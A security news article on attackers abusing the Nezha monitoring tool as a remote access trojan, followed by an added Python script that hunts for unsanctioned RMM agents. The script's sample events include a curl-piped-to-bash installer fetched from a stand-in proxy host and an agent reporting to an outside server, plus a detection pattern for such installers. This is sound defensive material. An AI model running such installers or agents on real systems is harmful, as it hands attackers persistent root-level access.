A new report out today from Swiss artificial intelligence-powered managed extended detection and response company Ontinue AG warns of the growing abuse of Nezha, a legitimate open-source server monitoring tool, as a stealthy post-exploitation remote access trojan.
Nezha, initially developed for the Chinese information technology community, has gained nearly 10,000 stars on GitHub and is actively maintained. The tool is used by systems administrators to monitor multiple servers, track resource usage, receive alerts and perform remote maintenance.
The problem with Nezha is that despite its legitimate use, it’s also now being used by attackers after initial compromise to gain persistent, high-privilege access to victim environments.
The Nezha agent by default provides attackers with system-level access on Windows and root access on Linux. That includes allowing for full command execution, interactive terminal sessions and file management without the need to exploit vulnerabilities or escalate privileges.
Since the software is legitimate and unmodified, it currently registers zero detections on VirusTotal across the major antivirus engines, making it highly effective at evading signature-based defenses.
Ontinue’s researchers discovered the malicious use of Nezha during an incident response engagement where the attackers attempted to deploy Nezha via a bash script that silently installed the agent and connected it to attacker-controlled infrastructure. The script included configuration values pointing to a command-and-control server and a shared authentication secret that allowed the agent to register with the Nezha dashboard.
The report notes that the deployment used a GitHub proxy service and disabled TLS, although the reasons for this remain unclear.
Further investigation found that the exposed Nezha dashboard associated with the incident appeared to manage hundreds of endpoints, suggesting widespread compromise. The infrastructure was hosted on Alibaba Cloud IP space geolocated to Japan, highlighting how attackers can easily blend malicious operations into legitimate cloud environments.
Testing confirmed that Nezha’s architecture, which combines web dashboard traffic and agent communications through a single port using standard HTTP and gRPC protocols, creates network activity that closely resembles normal monitoring telemetry. Because the traffic looks legitimate, attackers can maintain persistent access while avoiding obvious command-and-control indicators.
Mayuresh Dani, security research manager at the Qualys Threat Research Unit, told News via email that “the weaponization of Nezha reflects an emerging modern attack strategy where threat actors systematically abuse legitimate software to achieve persistence and lateral movement while evading signature-based defenses.”
“In networks where this server monitoring tool is pre-known, defender teams might even overlook this anomalous activity,” explains Dani. “This is not novel at all, as this behavior has been seen in the past with the usage of ‘Living Off the Land’ techniques and remote monitoring and management tools such as TeamViewer.”
He added that “what’s concerning is that the Nezha agent provides SYSTEM/root-level access. Though it isn’t malicious by design, it helps threat actors repurpose the use of this legitimate tool, cut development time to reliably execute remote commands, access remote files and access the compromised system using interactive shells.”
Dani recommends that to defend against the risk, organizations should inventory all RMM and remote access tools deployed across their infrastructure, configure monitoring tools for behavioral detection with real-time alerting and, if necessary, establish lifetime restrictions on the usage of RMM tools to prevent malicious reuse.
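The two recommendations above, inventorying deployed RMM and monitoring agents and alerting on their behaviour, can be applied to the deployment pattern described earlier in the article (an agent installed by a piped shell script, pointed at a server outside the organisation's control, with TLS disabled). The following is an added example written for this article, not code from Ontinue, Qualys or the Nezha project. The process-start events, the allowlist of sanctioned dashboard servers, the agent binary names and the `-s host:port -p secret --tls` command-line convention are all assumptions constructed for illustration; real agents may read their settings from a config file instead.

```python
"""Hunt for unsanctioned monitoring/RMM agents in process telemetry.

Added example; the events, allowlists and command-line conventions
below are constructed assumptions, not data from the report.
"""
import re
import shlex
from dataclasses import dataclass

# Monitoring/RMM agent executables we want inventoried (assumed names).
RMM_BINARIES = {"nezha-agent", "teamviewerd", "anydesk", "meshagent"}

# Dashboard servers the organisation actually operates (assumption).
SANCTIONED_SERVERS = {"monitor.corp.example:5555"}

# Accounts that give an agent full control of the host.
PRIVILEGED_USERS = {"root", "NT AUTHORITY\\SYSTEM"}

# "download something | sh" style installers, as used to deploy the agent.
INSTALL_PATTERN = re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh")

# Constructed EDR-style process-start records (not real telemetry).
EVENTS = [
    {"host": "web-01", "user": "root", "parent": "bash", "process": "nezha-agent",
     "cmdline": "/opt/nezha/agent/nezha-agent -s 203.0.113.10:5555 -p REDACTED_SECRET"},
    {"host": "db-02", "user": "root", "parent": "systemd", "process": "nezha-agent",
     "cmdline": "/opt/nezha/agent/nezha-agent -s monitor.corp.example:5555 -p REDACTED_SECRET --tls"},
    {"host": "web-01", "user": "root", "parent": "sshd", "process": "bash",
     "cmdline": "bash -c 'curl -sL https://gh-proxy.example/https://raw.githubusercontent.com/example-org/agent/main/install.sh | bash'"},
    {"host": "app-03", "user": "www-data", "parent": "systemd", "process": "nginx",
     "cmdline": "nginx -g 'daemon off;'"},
]


@dataclass(frozen=True)
class Finding:
    host: str
    severity: str
    reason: str


def parse_agent_args(cmdline):
    """Return (server, tls_enabled) from an agent command line.

    Assumes the agent is launched as '<bin> -s host:port -p <secret> [--tls]'.
    """
    argv = shlex.split(cmdline)
    server = None
    for i, tok in enumerate(argv):
        if tok == "-s" and i + 1 < len(argv):
            server = argv[i + 1]
    return server, "--tls" in argv


def inventory_agents(events):
    """Map each host to the set of (agent, server) pairs observed on it."""
    seen = {}
    for ev in events:
        if ev["process"] in RMM_BINARIES:
            server, _ = parse_agent_args(ev["cmdline"])
            seen.setdefault(ev["host"], set()).add((ev["process"], server))
    return seen


def detect(events):
    """Flag agents reporting outside the allowlist, TLS-less agents and piped installers."""
    findings = []
    for ev in events:
        host, proc, cmd = ev["host"], ev["process"], ev["cmdline"]
        if proc in RMM_BINARIES:
            server, tls = parse_agent_args(cmd)
            if server not in SANCTIONED_SERVERS:
                # An agent with root/SYSTEM rights talking to a server we do not
                # own is effectively a remote shell for whoever runs that server.
                sev = "critical" if ev["user"] in PRIVILEGED_USERS else "high"
                findings.append(Finding(host, sev,
                                        f"{proc} as {ev['user']} reporting to unsanctioned server {server}"))
            if proc == "nezha-agent" and not tls:
                findings.append(Finding(host, "medium", "nezha-agent running with TLS disabled"))
        elif INSTALL_PATTERN.search(cmd):
            findings.append(Finding(host, "medium",
                                    f"piped remote installer executed under {ev['parent']}"))
    return findings


if __name__ == "__main__":
    for host, agents in inventory_agents(EVENTS).items():
        print(f"{host}: {sorted(agents)}")
    for f in detect(EVENTS):
        print(f"[{f.severity}] {f.host}: {f.reason}")
```

The inventory output is what the "know every RMM tool you run" recommendation produces; the detection output is the behavioural alerting layered on top of it. In the constructed data, `db-02` is a sanctioned deployment and produces nothing, while `web-01` shows the full pattern from the article: a piped installer, an agent bound to an unknown server, and no TLS.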
